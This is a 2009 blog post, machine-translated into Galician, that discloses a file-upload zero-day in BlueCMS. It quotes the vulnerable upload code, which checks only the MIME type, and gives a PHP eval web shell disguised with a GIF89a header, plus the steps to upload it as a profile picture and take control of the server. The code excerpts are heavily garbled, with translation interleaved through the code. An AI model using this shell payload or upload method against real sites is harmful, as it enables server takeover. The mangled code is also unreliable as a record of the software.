bluecms 0 día-0 días, bluecms, bluecms 0 días, php, subida, blog arquivo cabeza-St0p 's

bluecms 0 días

Esta entrada foi publicada o 7 de outubro de 2009

: St0p
Reproducido por Escriba aquí a fonte: http://www.st0p.org

Nota: Sentímolo, a versión do cabelo de mañá á noite se chama dobre para o xornal un 0day, informado, e só ir ao oficial mirou, e lanzou un parche de seguridade pronto ah .. pode ir en liña non unha versión actualizada da proba ...

Desafortunadamente, o grupo Un amigo meu fixo un CMS, dixo que os datos do usuario para modificar algúns poden ser inxectado, dixo que a análise, coa localmente instalado despois, non pode usar comiñas simples son magic_quotes_gpc = off. . .

Vexa liña include / common.inc.php, renuncia. .

  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST Deep_addslashes = ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; R $ _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; R $ _REQUEST = Deep_addslashes ($ _REQUEST);
  }
 ......

Quizais St0p boa sorte, ver subir fotos de pezas, análise de código, usa algo que se atopa en user.php. .

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'include / upload.class.php'); / / chama a clase de carga
     new upload ( ) ; $ Imaxe = new a carga ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ Imaxe = $ Face_pic -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Non detectou sufixo directamente, a clase poderá pasar SHELL
	 }

Abre as inclúen / upload.class.php só para detectar a cabeceira do arquivo non detecta o sufixo

  ......
 a clase de subida {
	 = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; private $ allow_image_type = array ("image / jpg ',' image / gif ',' image / png ',' image / pjpeg ');
 ......
     $file , $dir = '' , $imgname = '' ) { img_upload función ($ ficheiro, $ dir ='', $ imgName ='') {
    	 empty ( $dir ) ) { if (empty ($ dir)) {
    		 BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; $ Dir = Data BLUE_ROOT de carga de datos ("YM") "/" ....;
    	 { Else {}
    		 BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; ... $ Dir = BLUE_ROOT de carga de datos $ Dir "/".;
    	 }

    	 ! file_exists ( $dir ) ) { if (! file_exists ($ dir)) {
    		 ! mkdir ( $dir ) ) { if (! mkdir ($ dir)) {
    			 ) ; showmsg ('o proceso de subida puido crear directorio ");
    		 }
    	 }
    	 empty ( $imgname ) ) { if (empty ($ imgName)) {
    		 $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; ImgName $ = $ this -> create_tempname () $ this -> get_type ($ ficheiro ['name']).;
    	 }
    	 $dir . $imgname ; ImgName $ = $ dir $ imgName.;
    	 ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { if (in_array ($ ficheiro ['type'], $ this -> allow_image_type)) {
              / / Só para detectar a cabeceira do ficheiro para a fronte, entón nós directamente como construír un SHELL
    		 ) ; showmsg ('non permite o tipo de imaxe');
    	 }


     }

Os save enriba para st0p.php

A 2	GIF89a ( $_POST [ st0p ] ) ; ?> <Php Eval ($ _POST [St0p]);?>

Nota Rede conta de usuario membro -> meu perfil, entón facer a carga da nova imaxe para a elección construímos un ficheiro PHP, punto para confirmar modificar, ver a dirección se consegue, botón dereito do rato sobre a imaxe directamente en liña. . SHELL palabra enviada con éxito!

A análise está rematada, espero que máis cambios, a cuestión destas cousas só quero atopar algúns amigos para discutir tecnoloxía, creou un grupo tan ben, só un grupo común, só 100 persoas, limpar, nunca falan foi mal cargado B caos T, deprimido, grupo aberto é o intercambio, non falan foi espazo reservado no lugar, queren progreso, estrada lonxe non pode ir!
Para o grupo só para obter os resultados das discusións doutros doutros, non sei a pagar, ou só vir mergullo, ou sen. . .